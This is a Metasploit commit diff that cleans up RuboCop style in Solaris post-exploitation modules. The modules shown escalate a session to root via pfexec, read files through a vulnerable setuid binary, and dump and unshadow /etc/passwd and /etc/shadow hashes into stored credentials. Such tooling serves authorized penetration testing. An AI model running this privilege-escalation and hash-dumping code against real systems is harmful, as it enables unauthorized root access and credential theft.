Land rapid7#20104, modules/post/solaris: Resolve RuboCop violations

Author: cgranleese-r7

modules/post/solaris/escalate/pfexec.rb

@@ -24,13 +24,18 @@ def initialize(info = {})
           ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],
           ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']
         ],
-        'SessionTypes' => ['shell']
+        'SessionTypes' => ['shell'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
       )
     )
-    register_options [
+    register_options([
       OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),
       OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])
-    ]
+    ])
   end
 
   def shell_path
@@ -43,37 +48,37 @@ def pfexec_path
 
   def run
     unless session.type == 'shell'
-      fail_with Failure::BadConfig, "This module is not compatible with #{session.type} sessions"
+      fail_with(Failure::BadConfig, "This module is not compatible with #{session.type} sessions")
     end
 
     if is_root?
-      fail_with Failure::BadConfig, 'Session already has root privileges'
+      fail_with(Failure::BadConfig, 'Session already has root privileges')
     end
 
-    unless command_exists? pfexec_path
-      fail_with Failure::NotVulnerable, "#{pfexec_path} does not exist"
+    unless command_exists?(pfexec_path)
+      fail_with(Failure::NotVulnerable, "#{pfexec_path} does not exist")
     end
 
     user = cmd_exec('id -un').to_s
 
-    print_status "Trying pfexec as `#{user}' ..."
+    print_status("Trying pfexec as `#{user}' ...")
 
-    res = cmd_exec "#{pfexec_path} #{shell_path} -c id"
+    res = cmd_exec("#{pfexec_path} #{shell_path} -c id")
     vprint_status res
 
-    unless res.include? 'uid=0'
-      fail_with Failure::NotVulnerable, "User `#{user}' does not have permission to escalate with pfexec"
+    unless res.include?('uid=0')
+      fail_with(Failure::NotVulnerable, "User `#{user}' does not have permission to escalate with pfexec")
     end
 
-    print_good 'Success! Upgrading session ...'
+    print_good('Success! Upgrading session ...')
 
-    cmd_exec "#{pfexec_path} #{shell_path}"
+    cmd_exec("#{pfexec_path} #{shell_path}")
 
     unless is_root?
-      fail_with Failure::NotVulnerable, 'Failed to escalate'
+      fail_with(Failure::NotVulnerable, 'Failed to escalate')
     end
 
-    print_good 'Success! root shell secured'
+    print_good('Success! root shell secured')
     report_note(
       host: session,
       type: 'host.escalation',

modules/post/solaris/escalate/srsexec_readline.rb

@@ -34,7 +34,12 @@ def initialize(info = {})
           ['EDB', '30021'],
           ['BID', '23915']
         ],
-        'DisclosureDate' => '2007-05-07'
+        'DisclosureDate' => '2007-05-07',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
     register_options([
@@ -48,14 +53,14 @@ def suid_bin_path
 
   def check
     if is_root?
-      fail_with Failure::BadConfig, 'Session already has root privileges'
+      fail_with(Failure::BadConfig, 'Session already has root privileges')
     end
 
     # This ls is based on the guidance in the sun alerts article
     unin = cmd_exec '/usr/bin/ls /opt/SUNWsrspx/bin/UninstallNetConnect.*.sh'
     unin =~ /UninstallNetConnect\.([\d.]{11})\.sh/
     unless ::Regexp.last_match(1)
-      print_error 'NetConnect uninstall not found, either not installed or too new'
+      print_error('NetConnect uninstall not found, either not installed or too new')
       return false
     end
 
@@ -64,10 +69,10 @@ def check
       print_error "#{version} is not vulnerable"
       return false
     end
-    print_good "#{version} is vulnerable"
+    print_good("#{version} is vulnerable")
 
-    unless setuid? suid_bin_path
-      vprint_error "#{suid_bin_path} is not setuid, it must have been manually patched"
+    unless setuid?(suid_bin_path)
+      vprint_error("#{suid_bin_path} is not setuid, it must have been manually patched")
       return false
     end
 
@@ -76,10 +81,10 @@ def check
 
   def run
     unless check
-      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
     end
 
-    flag = Rex::Text.rand_text_alpha 5
+    flag = Rex::Text.rand_text_alpha(5)
     output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}")
     vprint_good("Raw Command Output: #{output}")
 

modules/post/solaris/gather/checkvm.rb

@@ -21,7 +21,12 @@ module supports detection of Solaris Zone, VMWare, VirtualBox, Xen,
         'License' => MSF_LICENSE,
         'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform' => [ 'solaris' ],
-        'SessionTypes' => [ 'shell' ]
+        'SessionTypes' => [ 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end

modules/post/solaris/gather/enum_packages.rb

@@ -13,21 +13,31 @@ def initialize(info = {})
         info,
         'Name' => 'Solaris Gather Installed Packages',
         'Description' => %q{
-          Post module to enumerate installed packages on a Solaris System
+          Post module to enumerate installed packages on a Solaris system.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform' => [ 'solaris' ],
-        'SessionTypes' => [ 'shell' ]
+        'SessionTypes' => [ 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
 
-  # Run Method for when run command is issued
   def run
     distro = get_sysinfo
-    print_status("Running Module against #{distro[:hostname]}")
+    print_status("Running module against #{distro[:hostname]}")
     packages = cmd_exec('/usr/bin/pkginfo -l')
+
+    if packages.blank?
+      print_error('No packages identified')
+      return
+    end
+
     pkg_loot = store_loot('solaris.packages', 'text/plain', session, packages, 'installed_packages.txt', 'Solaris Installed Packages')
     print_good("Package list saved to loot file: #{pkg_loot}")
 

modules/post/solaris/gather/enum_services.rb

@@ -13,41 +13,47 @@ def initialize(info = {})
         info,
         'Name' => 'Solaris Gather Configured Services',
         'Description' => %q{
-          Post module to enumerate services on a Solaris System
+          Post module to enumerate services on a Solaris system.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform' => [ 'solaris' ],
-        'SessionTypes' => [ 'shell' ]
+        'SessionTypes' => [ 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
 
-  # Run Method for when run command is issued
   def run
     distro = get_sysinfo
     store_loot('solaris.version', 'text/plain', session, "Distro: #{distro[:hostname]}, Version: #{distro[:version]}, Kernel: #{distro[:kernel]}", 'solaris_info.txt', 'Solaris Version')
 
-    # Print the info
     print_good('Info:')
     print_good("\t#{distro[:version]}")
     print_good("\t#{distro[:kernel]}")
+
     installed_pkg = get_services
+    if installed_pkg.blank?
+      print_error('No services identified')
+      return
+    end
+
     pkg_loot = store_loot('solaris.services', 'text/plain', session, installed_pkg, 'configured_services.txt', 'Solaris Configured Services')
     print_good("Service list saved to loot file: #{pkg_loot}")
+
     if datastore['VERBOSE']
       print_good('Services:')
-
-      # Print the Packages
       installed_pkg.each_line do |p|
         print_good("\t#{p.chomp}")
       end
     end
   end
 
   def get_services
-    services_installed = ''
-    services_installed = cmd_exec('/usr/bin/svcs -a')
-    return services_installed
+    cmd_exec('/usr/bin/svcs -a') || ''
   end
 end

modules/post/solaris/gather/hashdump.rb

@@ -13,56 +13,58 @@ def initialize(info = {})
         info,
         'Name' => 'Solaris Gather Dump Password Hashes for Solaris Systems',
         'Description' => %q{
-          Post module to dump the password hashes for all users on a Solaris System
+          Post module to dump the password hashes for all users on a Solaris system.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
         'Platform' => [ 'solaris' ],
-        'SessionTypes' => [ 'shell' ]
+        'SessionTypes' => [ 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
 
-  # Run Method for when run command is issued
   def run
-    if is_root?
-      passwd_file = read_file('/etc/passwd')
-      shadow_file = read_file('/etc/shadow')
+    fail_with(Failure::NoAccess, 'You must run this module as root!') unless is_root?
 
-      # Save in loot the passwd and shadow file
-      p1 = store_loot('solaris.shadow', 'text/plain', session, shadow_file, 'shadow.tx', 'Solaris Password Shadow File')
-      p2 = store_loot('solaris.passwd', 'text/plain', session, passwd_file, 'passwd.tx', 'Solaris Passwd File')
-      vprint_good("Shadow saved in: #{p1}")
-      vprint_good("passwd saved in: #{p2}")
+    passwd_file = read_file('/etc/passwd')
+    shadow_file = read_file('/etc/shadow')
 
-      # Unshadow the files
-      john_file = unshadow(passwd_file, shadow_file)
-      john_file.each_line do |l|
-        hash_parts = l.split(':')
-        jtr_format = Metasploit::Framework::Hashes.identify_hash hash_parts[1]
-        if jtr_format.empty? # overide the default
-          jtr_format = 'des,bsdi,crypt'
-        end
-        credential_data = {
-          jtr_format: jtr_format,
-          origin_type: :session,
-          post_reference_name: refname,
-          private_type: :nonreplayable_hash,
-          private_data: hash_parts[1],
-          session_id: session_db_id,
-          username: hash_parts[0],
-          workspace_id: myworkspace_id
-        }
-        create_credential(credential_data)
-        print_good(l.chomp)
-      end
-      # Save pwd file
-      upassf = store_loot('solaris.hashes', 'text/plain', session, john_file, 'unshadowed_passwd.pwd', 'Solaris Unshadowed Password File')
-      print_good("Unshadowed Password File: #{upassf}")
+    # Save in loot the passwd and shadow file
+    p1 = store_loot('solaris.shadow', 'text/plain', session, shadow_file, 'shadow.tx', 'Solaris Password Shadow File')
+    p2 = store_loot('solaris.passwd', 'text/plain', session, passwd_file, 'passwd.tx', 'Solaris Passwd File')
+    vprint_good("Shadow saved in: #{p1}")
+    vprint_good("passwd saved in: #{p2}")
 
-    else
-      print_error('You must run this module as root!')
+    # Unshadow the files
+    john_file = unshadow(passwd_file, shadow_file)
+    john_file.each_line do |l|
+      hash_parts = l.split(':')
+      jtr_format = Metasploit::Framework::Hashes.identify_hash hash_parts[1]
+      if jtr_format.empty? # overide the default
+        jtr_format = 'des,bsdi,crypt'
+      end
+      credential_data = {
+        jtr_format: jtr_format,
+        origin_type: :session,
+        post_reference_name: refname,
+        private_type: :nonreplayable_hash,
+        private_data: hash_parts[1],
+        session_id: session_db_id,
+        username: hash_parts[0],
+        workspace_id: myworkspace_id
+      }
+      create_credential(credential_data)
+      print_good(l.chomp)
     end
+
+    # Save pwd file
+    upassf = store_loot('solaris.hashes', 'text/plain', session, john_file, 'unshadowed_passwd.pwd', 'Solaris Unshadowed Password File')
+    print_good("Unshadowed Password File: #{upassf}")
   end
 
   def unshadow(pf, sf)
@@ -78,6 +80,7 @@ def unshadow(pf, sf)
         end
       end
     end
+
     return unshadowed
   end
 end